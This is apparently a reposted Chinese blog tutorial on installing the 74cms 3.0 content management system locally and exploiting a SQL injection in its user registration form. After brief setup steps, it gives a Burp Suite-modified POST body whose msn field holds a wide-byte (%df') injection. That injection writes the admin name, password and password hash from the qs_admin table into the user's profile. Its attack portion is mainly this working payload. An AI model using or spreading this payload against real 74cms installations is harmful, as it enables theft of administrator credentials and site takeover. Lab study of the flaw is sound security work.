74cms3.0安装以及cmsSQL注入漏洞详解
生活随笔
收集整理的這篇文章主要介紹了
74cms3.0安装以及cmsSQL注入漏洞详解
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
?下載解壓到www目錄并開啟低版本PHP服務
訪問
http://127.0.0.1/74cms3.0/install/index.php?Error:Can‘t select MySQL database(74cms3.0)!問題解決
和我一樣就無腦確定
??按照提示配置,不知道填啥就寫root,郵箱隨便寫一個@qq.com之類的
?后臺(可略過)
?
?前臺
注冊
burpsuite抓包修改
realname=%B5%C8%D6%B0%EDE&sex=%C4%D0&birthday=1999-01-01&addresses=%BA%D3%C4%CF%BA%D3%C4%CF%D6%A3%D6%DD&mobile=&phone=17640366942&qq=15017777&msn=ha%df',profile=(select concat(admin_name,pwd,pwd_hash)from qs_admin)#&Submit=%B1%A3%B4%E6?有返回
?以下原因是由于PHP版本過低,
?
總結
以上是生活随笔為你收集整理的74cms3.0安装以及cmsSQL注入漏洞详解的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Go 语言教程
- 下一篇: 查询排序_MySQL使用UNION连接两